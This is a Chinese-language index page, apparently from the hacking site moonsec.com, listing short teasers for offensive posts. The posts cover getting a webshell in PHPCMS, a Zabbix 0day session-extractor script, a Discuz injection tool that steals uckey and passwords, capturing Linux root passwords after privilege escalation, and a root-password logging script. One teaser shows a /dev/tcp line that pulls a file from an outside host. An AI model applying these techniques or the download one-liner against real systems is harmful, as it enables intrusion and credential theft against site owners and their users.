PHPCMS 后台低权限拿SHELL 前提是需要有管理专题的权限 测试版本 PHPCMS 程序版本:Phpcms V9 .5.6 Release 20140522 过程 1. 添加...
11月21日588 views评论test
权限
PHPCMS后台低权限拿SHELL
11月21日588 views评论test
权限
11月21日588 views评论test
权限
XSS漏洞扫描器 – Xelenium
XSS漏洞扫描器 – Xelenium elenium是由owasp出品的一款安全测试工具,使用Java Swing编写,可以用来发现web应用中存在的安全漏洞 。 当前版本可以发...
11月21日moonsec_com895 views评论xss
漏洞
渗透用的Python小脚本
0x00 渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。
11月21日moonsec_com362 views评论python
root
阿里峰会议题pdf分享
告诉你们我是用意念在日站(渗透实战)
Zabbix 2.0.1 Session Extractor 0day
#!/usr/bin/python import re import sys,urllib2,urllib print "/n[*] Zabbix 2.0.1 Session Extractor 0d...
11月21日moonsec_com359 views评论print
session
DZ论坛最新注入漏洞利用工具(获取uckey和帐号密码)
DZ论坛最新注入漏洞利用工具 (获取uckey和帐号密码) DZ论坛最新注入漏洞利用工具(获取uckey和帐号密码)解压码:www.moonsec.com.rar
11月21日2,495 views评论漏洞
获取
提权后获取linux root密码
在webbackdoor本身是root (可能性小的可怜)或通过某漏洞 溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记...
11月21日moonsec_com526 views评论root
密码
Windows+Apache+Python配置简略,2011完整无错版
哥们倒腾了四五年的PHP以后,面对日益严重的桌面软件需求,终于下定决心要开始Python的学习之路了。 去年学了C#的半本书,无奈其较高的学习门槛和跨平台缺陷,最终还是转向了Python,估且算是俺的...
11月21日moonsec_com313 views评论php
python
Linux常用渗透小技巧
1.无wget nc等下载工具时下载文件 exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.p...
11月21日moonsec_com327 views评论export
linux
发个一句话附带连接方法
记录一个linux下小脚本(记录root密码)
#!/usr/bin/python import os, sys, getpass, time current_time = time.strftime("%Y-%m-%d %H:%M") logfi...
11月21日moonsec_com386 views评论str
time
65